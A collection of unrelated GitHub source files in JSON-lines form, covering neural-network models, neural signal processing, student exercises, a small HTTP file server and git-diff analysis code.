nn.init.constant_(self.bn2.weight, 1)\n nn.init.constant_(self.bn2.bias, 0)\n \n def forward(self, x): \n feature = self.extract_feat(x)\n logits = self.final(feature)\n return logits\n # return feature\n\n def extract_feat(self, x):\n x = self.backbone(x)\n x = self.pooling(x)\n x = self.flatten(x) \n x = self.bn1(x)\n x = self.fc1(x)\n x = self.relu(x) \n x = self.bn2(x)\n x = self.dropout1(x)\n return x\n\ndef get_model(config):\n num_classes = config.model.num_classes\n model_name = config.model.arch\n fc_dim = config.model.fc_dim\n loss_module = config.loss.name\n antialias = config.model.antialias\n\n net = RecursionNet(num_classes=num_classes, model_name=config.model.arch,\n fc_dim=fc_dim, loss_module=loss_module, antialias=antialias)\n \n return net","repo_name":"wjensheng/recursion","sub_path":"models/model_factory.py","file_name":"model_factory.py","file_ext":"py","file_size_in_byte":7059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"14103669285","text":"\"\"\"\nTop-level trial data bandpower processing\n\nAuthored by Eric Easthope\n\"\"\"\n\nimport os\nimport warnings\nimport numpy as np\nimport scipy.signal as sig\nimport resampy\nimport multiprocess as mp\nfrom pathlib import Path\nfrom utils import log_scale_bands\n\n# Filter warnings\nwarnings.filterwarnings(\"ignore\")\n\nDATA = \"data\"\nDERIVED = \"derived\"\nsubjects = [\"EC2\", \"EC9\", \"GP31\", \"GP33\"]\nBANDS = (\n log_scale_bands(12, 35, 2)\n + log_scale_bands(35, 70, 2)\n + log_scale_bands(70, 140, 2)\n)\n\nMIN_REST_LENGTH = 0.5\nOVERWRITE = True\nfs = 3052\nnyq = fs // 2\nr = int(MIN_REST_LENGTH * fs)\npad = int(0.5 * fs)\n\n# Average consonant/vowel length, cross-session\navg_consonant_len = np.concatenate(\n [\n [c for c in np.load(p, allow_pickle=True) if c is not None]\n for p in Path(DERIVED).glob(f\"*/**/*-ee-consonants.npy\")\n ]\n).mean()\navg_vowel_len = np.concatenate(\n [\n [v for v in np.load(p, allow_pickle=True) if v is not None]\n for p in Path(DERIVED).glob(f\"*/**/*-ee-vowels.npy\")\n ]\n).mean()\n\nfor SUBJECT in subjects:\n for path in [p for p in Path(DATA).glob(f\"{SUBJECT}*.nwb\")]:\n _, SESSION = path.stem.split(\"_\")\n OUT = DERIVED + f\"/{SUBJECT}/{SESSION}\"\n print(f\"File {SUBJECT}_{SESSION}.\")\n\n if os.path.isdir(f\"{OUT}/powers\") and not OVERWRITE:\n print(\"Powers exist already, skipping ...\")\n else:\n # LOAD\n cx = np.load(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-consonants.npy\",\n allow_pickle=True,\n )\n vx = np.load(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-vowels.npy\",\n allow_pickle=True,\n )\n idx = np.load(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-indices.npy\",\n allow_pickle=True,\n )\n goods = np.load(\n f\"{OUT}/{SUBJECT}_{SESSION}-good-channels.npy\",\n allow_pickle=True,\n )\n epochs = np.load(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-epochs.npy\",\n allow_pickle=True,\n )\n\n # RE-REFERENCE, subtract average signal from each channel\n def rereference(s):\n return (s.T - s[:, goods].mean(axis=1)).T\n\n # NOTCH FILTER, 60/120/180 Hz line noise\n def notch(s, Hz):\n # NOTCH FILTER\n Q = 30\n b, a = sig.iirnotch(Hz, Q=Q, fs=fs)\n return sig.filtfilt(b, a, s, axis=0)\n\n # BANDPASS FILTER\n def bandpass(s, band):\n # BANDPASS FILTER\n [l, h] = band\n low = l / nyq\n high = h / nyq\n ORDER = 3\n sos = sig.butter(ORDER, [low, high], \"band\", analog=False, output=\"sos\")\n return sig.sosfiltfilt(sos, s, axis=0)\n\n # ANALYTIC SIGNAL, Hilbert transform\n def analytic(s):\n return sig.hilbert(s, axis=0)\n\n # POWER\n def power(s):\n return np.abs(s) ** 2.0\n\n # STRETCH, Time-warp consonant/vowel to average lengths w/ sinc interpolation\n def stretch(s, i):\n [pad1, irp1, con, vow, irp2, pad2] = np.split(s, i[1:-1])\n [rest1, start, cv, stop, rest2] = i[1:-1]\n\n c_scale = fs * avg_consonant_len / len(con)\n v_scale = fs * avg_vowel_len / len(vow)\n\n c_fs = np.floor(fs * c_scale).astype(int)\n v_fs = np.floor(fs * v_scale).astype(int)\n c_pad = np.floor(pad * c_scale).astype(int)\n v_pad = np.floor(pad * v_scale).astype(int)\n\n c_stretched = resampy.resample(\n s[start - pad : cv + pad],\n fs,\n c_fs,\n filter=\"sinc_window\",\n axis=0,\n )[c_pad:-c_pad]\n v_stretched = resampy.resample(\n s[cv - pad : stop + pad],\n fs,\n v_fs,\n axis=0,\n filter=\"sinc_window\",\n )[v_pad:-v_pad]\n\n return np.concatenate(\n [pad1, irp1, c_stretched, v_stretched, irp2, pad2]\n ), np.cumsum(\n [\n 0,\n len(pad1),\n len(irp1),\n len(c_stretched),\n len(v_stretched),\n len(irp2),\n len(pad2),\n ]\n )\n\n # Total process\n def process(e, i, low, high):\n return (\n stretch(\n power(\n analytic(\n bandpass(\n notch(notch(notch(rereference(e), 60), 120), 180),\n [low, high],\n )\n )\n ),\n i,\n )\n if e is not None and i is not None\n else (None, None)\n )\n\n # Make powers directory if it does not exist\n try:\n os.mkdir(f\"{OUT}/powers\")\n except FileExistsError:\n pass\n\n for (low, high) in BANDS:\n l = np.ceil(low).astype(int)\n h = np.ceil(high).astype(int)\n print(f\"{l}-{h} Hz ...\")\n with mp.Pool(processes=8) as pool:\n results = pool.starmap(\n process,\n [(epochs[i], idx[i], low, high) for i in range(len(epochs))],\n )\n powers, indices = zip(*results)\n np.save(\n f\"{OUT}/powers/{SUBJECT}_{SESSION}-powers-ee-{l}-{h}.npy\",\n powers,\n allow_pickle=True,\n )\n np.save(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-indices-stretched.npy\",\n indices,\n allow_pickle=True,\n )\n\n print(\"Done.\")\n print()\n","repo_name":"ericeasthope/as-in-ecog","sub_path":"process-epochs.py","file_name":"process-epochs.py","file_ext":"py","file_size_in_byte":6351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34060101513","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 21:49:54 2019\n\n@author: Will\n\"\"\"\n\nnum=float(input(\"Give a decimal number between 0 and 1: \"))\np=0\nwhile ((2**p)*num)%2!=0:\n p+=1\nnumber=int((2**p)*num)\nresult=\"\"\nwhile number>0:\n result=str(number%2)+result\n number=number//2\nfinal_result=int(result)/(10**p)\nprint(final_result)","repo_name":"cuichacha/MIT-6.00.1x","sub_path":"Week 2: Simple Programs/3. Simple Algorithms/convert float to binary.py","file_name":"convert float to binary.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39335818167","text":"import torch\r\nimport numpy as np\r\n\r\nfrom typing import List, Optional\r\nfrom torch.utils.data import DataLoader\r\nfrom Core.Constants import CoNLL_BIO\r\nfrom Core.Util import one_hot\r\n\r\n\r\nclass Dataset(torch.utils.data.Dataset):\r\n def __init__(self,\r\n text: List[str],\r\n embs: List[torch.Tensor],\r\n lbs: List[List[str]]\r\n ):\r\n \"\"\"\r\n A wrapper class to create syntax dataset for syntax expansion training.\r\n \"\"\"\r\n super().__init__()\r\n self._embs = embs\r\n self._text = text\r\n self._lbs = lbs\r\n\r\n @property\r\n def n_insts(self):\r\n \"\"\" Property for dataset size \"\"\"\r\n return len(self._text)\r\n\r\n def __len__(self):\r\n return self.n_insts\r\n\r\n def __getitem__(self, idx):\r\n return self._text[idx], self._embs[idx], self._lbs[idx]\r\n\r\n\r\ndef batch_prep(emb_list: List[torch.Tensor],\r\n lbs_list: Optional[List[List[str]]],\r\n txt_list: Optional[List[List[str]]] = None):\r\n \"\"\"\r\n Pad the instance to the max seq max_seq_length in batch\r\n \"\"\"\r\n for emb, txt, lbs in zip(emb_list, txt_list, lbs_list):\r\n assert len(emb) == len(txt) == len(lbs)\r\n d_emb = emb_list[0].size(-1)\r\n seq_lens = [len(emb) for emb in emb_list]\r\n max_seq_len = np.max(seq_lens)\r\n\r\n emb_batch = torch.stack([\r\n torch.cat([inst, torch.zeros([max_seq_len-len(inst), d_emb])], dim=-2) for inst in emb_list\r\n ])\r\n\r\n lbs_batch = np.array([\r\n inst + [-1] * (max_seq_len - len(inst))\r\n for inst in lbs_list\r\n ])\r\n\r\n lbs_batch = torch.tensor(lbs_batch, dtype=torch.long)\r\n seq_lens = torch.tensor(seq_lens, dtype=torch.long)\r\n\r\n return emb_batch, lbs_batch, seq_lens, txt_list\r\n\r\n\r\ndef collate_fn(insts):\r\n \"\"\"\r\n Principle used to construct dataloader\r\n\r\n :param insts: original instances\r\n :return: padded instances\r\n \"\"\"\r\n txt, embs, lbs = list(zip(*insts))\r\n batch = batch_prep(emb_list=embs, lbs_list=lbs, txt_list=txt)\r\n return batch\r\n","repo_name":"dreamyang-liu/Neural-HMM","sub_path":"Legacy/CoNLL03/MMData.py","file_name":"MMData.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29395706079","text":"#La función debe retornar la distancia como un string\n# +1 : si la distancia es mayor que 1\n# IB : si la distancia es 1, y para llegar de una palabra a la otra hay que\n# insertar o borrar una letra\n# 1S : si la distancia es 1 porque hay que sustituir una letra\n# 0D : si las palabras son iguales\n\n\ndef levenshtein(p1,p2):\n x = len(p1)\n y = len(p2)\n\n if x == y:\n if p1 == p2:\n z = \"0D\"\n else:\n\n diferentes = 0\n i = 0\n while i < x:\n if p1[i] != p2[i]:\n diferentes = diferentes + 1\n i = i + 1\n if diferentes > 1 :\n z = \"+1\"\n else:\n z = \"1S\"\n else:\n if x > y :\n mayor = p1\n menor = p2\n elif x < y:\n mayor = p2\n menor = p1\n if (len(mayor) - len(menor)) == 1:\n z = \"IB\"\n else:\n z = \"+1\"\n\n\n return z","repo_name":"pabloschwarzenberg/grader","sub_path":"tema10_ej2/tema10_ej2_b50e613b5beb17438691584128739204.py","file_name":"tema10_ej2_b50e613b5beb17438691584128739204.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73361275449","text":"import tensorflow as tf\nimport numpy as np\nfrom dataset.DataSets2 import ds\n\ndef get_dict(database):\n xs,ys = database.NextTrainingBatch()\n return {x:xs, y_desired:ys}\n\ntrain = ds.DataSets2('/Users/fabienfluro/Documents/MS_BGD/Fil_Rouge/Work/Gender_CNN/data/...train')\ntest = ds.DataSets2('/Users/fabienfluro/Documents/MS_BGD/Fil_Rouge/Work/Gender_CNN/data/...test')\n\nwith tf.nape_scope('input'):\n x = tf.placeholder(tf.float32, [None, None], name='x')\n y_desired = tf.placeholder(tf.float32, [None, 2], name='y_desired')\n\n\n\n# sess = tf.Session()\n# sess.run(tf.global_variables_initializer())\n\n# data, labels = train.NextTrainingBatch(sess)\n\n\n# sess.close()\n\n# print(data)\n# print(labels)\n\n\n# print(np.shape(images_data[0][0]))\n# print('data:')\n# print(images_data[0])\n# print('labels:')\n# print(images_data[1])\n\n\n# print(np.shape(images_data))\n\n# plt.imshow(data[0])\n# plt.show()","repo_name":"fab971/CNN-Gender","sub_path":"src/sandbox3.py","file_name":"sandbox3.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20212379525","text":"# This script compares RF-IC register setting values.\n# For tips for treating C-style struct data in Python3, see: [PythonでバイナリをあつかうためのTips](https://qiita.com/pashango2/items/5075cb2d9248c7d3b5d4)\n\nimport dataclasses\nimport ctypes\nfrom typing import List\n\nLOG_BUF_LEN = 200\n\nclass SerialCommand_C(ctypes.Structure):\n _pack_ = 2\n _fields_ = (\n ('cmd1', ctypes.c_uint16),\n ('cmd2', ctypes.c_uint16),\n ('data1', ctypes.c_uint16),\n ('data2', ctypes.c_uint16),\n )\n\nclass SerialCommandHistory(ctypes.Structure):\n _pack_ = 2\n _fields_ = (\n ('numEntry', ctypes.c_uint16),\n ('buf', SerialCommand_C * LOG_BUF_LEN)\n )\n\n@dataclasses.dataclass\nclass RfIcRegVal():\n sysId: int\n regAddr: int\n val: int\n\ndef loadData(path: str) -> List[RfIcRegVal]:\n DEV_ID_FOO = 0x0B\n\n serialCommandHistory = SerialCommandHistory()\n\n with open(path, 'rb') as file:\n file.readinto(serialCommandHistory)\n\n numEntry = serialCommandHistory.numEntry\n historyBuf = serialCommandHistory.buf\n rfIcRegVals: List[RfIcRegVal] = []\n\n for entry in historyBuf:\n devId = entry.cmd1>>8\n if devId == DEV_ID_FOO:\n sysId = 0\n regAddr = (entry.data2>>8)&0x0FF\n val = entry.data2&0x0FF\n rfIcRegVals.append(RfIcRegVal(sysId, regAddr, val))\n\n return rfIcRegVals\n\nFILE_PATH_SerialCommandHistory_1 = \"C:/serialCommandHistory.bin\"\ngrfIcRegVals_1 = loadData(FILE_PATH_SerialCommandHistory_1)\n","repo_name":"motchy869/code-fractions","sub_path":"Neumann-type-computer/computer-science/binary-data-operation/read_C-style_structure.py","file_name":"read_C-style_structure.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25137705076","text":"from http.server import HTTPServer, SimpleHTTPRequestHandler\n\n\nclass xxxxx(SimpleHTTPRequestHandler):\n\n def do_GET(self):\n path = self.translate_path(self.path)\n f = None\n try:\n f = open(path, 'rb')\n except OSError:\n self.path = '/'\n ff = self.send_head()\n self.copyfile(ff, self.wfile)\n ff.close()\n return\n finally:\n if f:\n f.close()\n\n f = self.send_head()\n if f:\n try:\n self.copyfile(f, self.wfile)\n finally:\n f.close()\n\n\ndef run(server_class=HTTPServer, handler_class=xxxxx):\n server_address = ('0.0.0.0', 22222)\n httpd = server_class(server_address, handler_class)\n httpd.serve_forever()\n\n\nrun()\n","repo_name":"filipagh/cmms","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1285727889","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime\nimport time\n\nimport tensorflow as tf\nimport numpy as np\n\nimport random\n\nDim = 5\nNN = Dim*Dim*Dim \nfilename = 'Data_'+str(Dim)\nfile0 = open(filename,'r')\nlines = file0.readlines()\nN = len(lines)\nN = 200000\nfrom random import shuffle\n\n\n\ndef weight_variable(shape):\n\t\n\tinitial = tf.truncated_normal(shape,mean = 0,stddev = 0.01)\n\treturn tf.Variable(initial)\n\ndef bias_variable(shape):\n\t\n\tinitial = tf.constant(0.01,shape=shape)\n\treturn tf.Variable(initial)\n\ndef conv3d(x,W):\n\t\n\treturn tf.nn.conv3d(x,W,strides=[1,1,1,1,1],padding='SAME')\n\t\ndef max_pool_3x3(x):\n\n\treturn tf.nn.max_pool3d(x,ksize = [1,3,3,3,1],strides=[1,2,2,2,1],padding='VALID')\n\nX = tf.placeholder('float',[None,Dim,Dim,Dim,1])\nY = tf.placeholder('float',[None,2])\n\nW_conv1 = weight_variable([2,2,2,1,20])\nb_conv1 = bias_variable([20])\nh_conv1 = tf.nn.relu(conv3d(X, W_conv1) + b_conv1)\nh_pool1 = max_pool_3x3(h_conv1)\n\nW_conv2 = weight_variable([2,2 ,2, 20,32])\nb_conv2 = bias_variable([32])\nh_conv2 = tf.nn.relu(conv3d(h_pool1, W_conv2) + b_conv2)\n#h_pool2 = max_pool_2x2(h_conv2)\n\n\nW_fc1 = weight_variable([2*2*2*32, 200])\nb_fc1 = bias_variable([200])\n\nh_pool2_flat = tf.reshape(h_conv2, [-1, 2*2*2*32])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\nW_fc2 = weight_variable([200, 2])\nb_fc2 = bias_variable([2])\nh_fc2 = tf.nn.relu(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\ny_conv=tf.nn.softmax(h_fc2)\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nsaver = tf.train.Saver()\n\nwrite = tf.summary.FileWriter('.')\nwrite.add_graph(tf.get_default_graph())\n\nsaver.restore(sess,\"./model/my_checkpoint\")\n\n","repo_name":"zhangfeiyang/mm_trigger_machine_learning","sub_path":"draw_model.py","file_name":"draw_model.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37055064012","text":"\"\"\"\n @file user_git_diff.py\n @brief\n User git diff logic. Get user's working data, calling data, and user's last commit data.\n\"\"\"\nfrom pathlib import Path\nimport os\nimport json\nimport ast\n\nclass user_git_info:\n\n # Constructor\n def __init__(self, content):\n self.content = content\n\n for proj_name_temp in self.content['git_diff'].keys():\n self.proj_name = proj_name_temp\n\n self.user_name = self.content['git_id']\n\n # getters\n def get_proj_name(self):\n return self.proj_name\n\n\n def get_user_name(self):\n return self.user_name\n\n\n def get_working_data(self):\n\n # working_list = [ [\"file_name\", \"logic_name\", \"work_line\", \"work_amount\"], [\"file_name\", \"logic_name\", \"work_line\", \"work_amount\"], ... ]\n working_list = []\n\n # get file dict\n temp_work_data_dict = self.content['git_diff'][self.proj_name]\n\n for file_name in temp_work_data_dict.keys():\n\n logic_list = temp_work_data_dict[file_name]\n # search each file name and each logic name\n # temp_work = [\"file_name\", \"logic_name\", \"work_line\", \"work_amount\"]\n for temp_logic in logic_list:\n temp_work = []\n temp_work.append(file_name.replace('\\\\', '/')) # file_name\n temp_work.append(temp_logic[0]) # logic_name\n temp_work.append(temp_logic[1]) # work_line\n temp_work.append(temp_logic[2]) # work_amount\n\n # append temp_work\n working_list.append(temp_work)\n\n return working_list\n\n def get_edit_amount(self):\n\n edit_amount = dict()\n\n # get edit_amount\n for file_name, temp_amount in self.content['total_plus'].items():\n edit_amount[file_name] = dict()\n edit_amount[file_name]['total_plus'] = temp_amount\n edit_amount[file_name]['total_minus'] = self.content['total_minus'][file_name]\n edit_amount[file_name]['git_diff_code'] = self.get_git_diff_info(file_name)\n\n return edit_amount\n\n def get_git_diff_info(self, file_name):\n git_diff_info = self.content['git_diff_info'][file_name]\n\n git_diff_code = \"|||\".join(git_diff_info).replace(\"'\", \"\\\\'\")\n print(\"get_git_diff_info\", git_diff_code)\n\n return git_diff_code\n\n\n def get_git_diff_code(self, file_name):\n minus_list = self.content['minus_list'][file_name]\n plus_list = self.content['plus_list'][file_name]\n modify_file = self.content['modify_file'][file_name]\n\n git_diff_code = \"\"\n git_diff_file = []\n\n for idx, line in enumerate(modify_file):\n git_diff_file.append(line)\n # print(idx, line)\n\n # 105번째가 수정되었으면, 104번째에서 -, 105번째에서 +\n for code, line in plus_list:\n git_diff_file[line - 1] = \"+\" + str(code) + \"\\n\"\n # print(\"plus\", line, git_diff_file[line - 1])\n\n for code, line in minus_list:\n git_diff_file[line] = \"-\" + str(code) + \"\\n\" + git_diff_file[line]\n # print(\"minus\", line, git_diff_file[line])\n\n # for idx, code in enumerate(git_diff_file):\n # print(idx + 1, code)\n\n git_diff_code = \"|||\".join(git_diff_file).replace(\"'\", \"\\\\'\")\n\n return git_diff_code\n\n def get_calling_data(self):\n call_dict = dict()\n calling_dict = dict()\n project_name = self.proj_name[:-4]\n\n for file_name, context_temp in self.content['modify_file'].items():\n call_dict[file_name] = dict()\n calling_dict[file_name] = dict()\n context = context_temp\n parse_tree = ast.parse(''.join(context))\n\n import_table = dict()\n import_from_table = dict()\n self.extract_call(parse_tree, import_table, import_from_table, call_dict[file_name])\n\n for plus_temp in self.content['plus_list'][file_name]:\n if plus_temp[1] in call_dict[file_name].keys():\n for call_dict_context in call_dict[file_name][plus_temp[1]]:\n if call_dict_context is not None:\n call_context = call_dict_context.split(\".\")\n func_name = call_context[-1]\n file_path_and_class_context = call_context[:-1]\n file_path = \"\"\n class_context = []\n while file_path_and_class_context:\n print(os.path.join(os.path.pardir, project_name, \"/\".join(file_path_and_class_context)) + \".py\")\n if os.path.exists(os.path.join(os.path.pardir, project_name, \"/\".join(file_path_and_class_context)) + \".py\"):\n file_path = os.path.join(project_name, \"/\".join(file_path_and_class_context)) + \".py\"\n break\n class_context.append(file_path_and_class_context[-1])\n file_path_and_class_context.pop()\n\n # Include call in same file\n if not file_path:\n file_path = file_name\n if plus_temp[1] not in calling_dict[file_name].keys():\n calling_dict[file_name][plus_temp[1]] = []\n calling_dict[file_name][plus_temp[1]].append({\"file_path\": file_path, \"class_context\": class_context[::-1], \"func_name\": func_name})\n\n # # Except call in same file\n # if file_path:\n # calling_dict[file_name][plus_temp[1]] = {\"file_path\": file_path, \"class_context\": class_context, \"func_name\": func_name}\n\n for file_name, temp_calling_list in calling_dict.items():\n for line_num, temp_calling_list_list in temp_calling_list.items():\n for temp_calling in temp_calling_list_list:\n temp_logic = \"\"\n if temp_calling['class_context']:\n temp_logic += \"class\"\n for temp_class in temp_calling['class_context']:\n temp_logic += \":\" + temp_class\n temp_logic += \":\" + temp_calling['func_name']\n\n else:\n temp_logic += \"function:\" + temp_calling['func_name']\n temp_calling['logic'] = temp_logic\n\n for file_name, call_list_dict in calling_dict.items():\n print(\"Final calling\", file_name, \" : \", calling_dict[file_name])\n\n return calling_dict\n\n\n def extract_call(self, node, import_table, import_from_table, call_list_dict, assign_dict=dict()):\n for each in node.body:\n\n if isinstance(each, ast.FunctionDef):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.ClassDef):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.For):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.While):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.If):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.With):\n self.extract_call(each, import_table, import_from_table, call_list_dict)\n\n elif isinstance(each, ast.Assign):\n if isinstance(each.value, ast.Call):\n names = []\n for name in each.targets:\n if isinstance(name, ast.Name):\n names.append(name.id)\n\n for keyword in each.value.keywords:\n if isinstance(keyword.value, ast.Call):\n stack = self.get_extract_call_logic(keyword.value.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n for arg in each.value.args:\n if isinstance(arg, ast.Call):\n stack = self.get_extract_call_logic(arg.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n stack = self.get_extract_call_logic(each.value.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n elif isinstance(each.value, ast.BinOp):\n if isinstance(each.value.left, ast.Call):\n names = []\n for name in each.targets:\n if isinstance(name, ast.Name):\n if name.id in assign_dict:\n del assign_dict[name.id]\n names.append(name.id)\n stack = self.get_extract_call_logic(each.value.left.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n if isinstance(each.value.right, ast.Call):\n names = []\n for name in each.targets:\n if isinstance(name, ast.Name):\n if name.id in assign_dict:\n del assign_dict[name.id]\n names.append(name.id)\n stack = self.get_extract_call_logic(each.value.right.func, import_table, import_from_table, assign_dict, names)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n if isinstance(each.value.left, ast.Name) or isinstance(each.value.right, ast.Name):\n names = []\n for name in each.targets:\n if isinstance(name, ast.Name):\n if name.id in assign_dict:\n del assign_dict[name.id]\n names.append(name.id)\n if isinstance(each.value.left, ast.Name) :\n cur = each.value.left\n elif isinstance(each.value.right, ast.Name):\n cur = each.value.right\n\n stack = []\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id, cur.id))))\n stack = stack[::-1]\n list = stack[0].split('.')[:-1]\n class_name = \".\".join(list)\n check = 0\n for key, ele in assign_dict.items():\n if ele == class_name:\n check = 1\n\n if check == 0:\n class_name = stack[0]\n\n for name in names:\n assign_dict[name] = class_name\n call_list_dict[each.lineno] = class_name\n\n elif isinstance(each, ast.Expr):\n if isinstance(each.value, ast.Call):\n for keyword in each.value.keywords:\n if isinstance(keyword.value, ast.Call):\n stack = []\n cur = keyword.value.func\n check = 0\n while isinstance(cur, ast.Attribute):\n if check == 0:\n stack.append(assign_dict.get(cur.attr, import_from_table.get(cur.attr, cur.attr)))\n check = 1\n else:\n stack.append(assign_dict.get(cur.attr, import_table.get(cur.attr, import_from_table.get(cur.attr, cur.attr))))\n cur = cur.value\n if not isinstance(cur, ast.Name):\n continue\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id,cur.id))))\n stack = stack[::-1]\n stack = '.'.join(stack)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n for arg in each.value.args:\n if isinstance(arg, ast.Call):\n stack = []\n cur = arg.func\n check = 0\n while isinstance(cur, ast.Attribute):\n if check == 0:\n stack.append(assign_dict.get(cur.attr, import_from_table.get(cur.attr, cur.attr)))\n check = 1\n else:\n stack.append(assign_dict.get(cur.attr, import_table.get(cur.attr, import_from_table.get(cur.attr, cur.attr))))\n cur = cur.value\n if not isinstance(cur, ast.Name):\n continue\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id, cur.id))))\n stack = stack[::-1]\n stack = '.'.join(stack)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n stack = []\n cur = each.value.func\n check = 0\n while isinstance(cur, ast.Attribute):\n if check == 0:\n stack.append(assign_dict.get(cur.attr, import_from_table.get(cur.attr, cur.attr)))\n check = 1\n else:\n stack.append(assign_dict.get(cur.attr, import_table.get(cur.attr, import_from_table.get(cur.attr, cur.attr))))\n cur = cur.value\n if not isinstance(cur, ast.Name):\n continue\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id, cur.id))))\n stack = stack[::-1]\n stack = '.'.join(stack)\n if each.lineno not in call_list_dict.keys():\n call_list_dict[each.lineno] = []\n call_list_dict[each.lineno].append(stack)\n\n elif isinstance(each, ast.Import):\n for name in each.names:\n if name.asname != None:\n import_table[name.asname] = name.name\n\n elif isinstance(each, ast.ImportFrom):\n module = each.module\n for name in each.names:\n if name.asname == None:\n import_from_table[name.name] = module + '.' + name.name\n else:\n import_from_table[name.asname] = module + '.' + name.name\n\n def get_extract_call_logic(self, cur, import_table, import_from_table, assign_dict, names):\n stack = []\n check = 0\n while isinstance(cur, ast.Attribute):\n if check == 0:\n stack.append(assign_dict.get(cur.attr, import_from_table.get(cur.attr, cur.attr)))\n check = 1\n else:\n stack.append(assign_dict.get(cur.attr, import_table.get(cur.attr, import_from_table.get(cur.attr, cur.attr))))\n cur = cur.value\n\n if not isinstance(cur, ast.Name):\n return\n stack.append(assign_dict.get(cur.id, import_table.get(cur.id, import_from_table.get(cur.id, cur.id))))\n stack = stack[::-1]\n stack = '.'.join(stack)\n for name in names:\n assign_dict[name] = stack\n\n return stack\n\n def get_last_commit_data(self):\n last_commit_date = \"\"\n git_log_name_only = self.content['git_log_name_only']\n for line in git_log_name_only:\n if line[:5] == 'Date:':\n last_commit_date = line\n break\n\n return last_commit_date\n\n def get_log_file_list(self):\n log_file_list = []\n git_log_name_only = self.content['git_log_name_only']\n\n pos_check = 0\n row = []\n for line in git_log_name_only:\n if line == '':\n pos_check += 1\n pos_check %= 3\n if pos_check == 0:\n log_file_list.insert(0, row)\n row = []\n continue\n\n if pos_check == 2:\n if line[:7] == 'commit ':\n pos_check = 0\n continue\n row.append(line)\n\n if row:\n log_file_list.insert(0, row)\n\n return log_file_list\n","repo_name":"codingsoo/conflict-prediction","sub_path":"server_dir/user_git_diff.py","file_name":"user_git_diff.py","file_ext":"py","file_size_in_byte":18151,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"25687600211","text":"from promax.infrastructure.promax.request_object import RequestObject\nimport logging\n\nlogger = logging.getLogger()\n\n\nclass OrderHistoryByOrderIdRequest(RequestObject):\n\n def __init__(self, unb, cnpj, order_id):\n self.unb = unb\n self.cnpj = cnpj\n self.Usuario = \"menucomvc\"\n self.idPedidoFacil = order_id\n\n @property\n def payload(self):\n payload = \"nrCnpj={cnpj}&ppopcao=55&idTabela=3&&idPedidoFacil={idPedidoFacil}&requisicao=9&opcao=12&idEntregue=S&idAberto=S&idFaturado=S&idAgendado=S&siteV2=S\"\"&unb={unb}&Usuario={Usuario}\".format(\n unb=self.unb, cnpj=self.cnpj, Usuario=self.Usuario, idPedidoFacil=self.idPedidoFacil)\n return 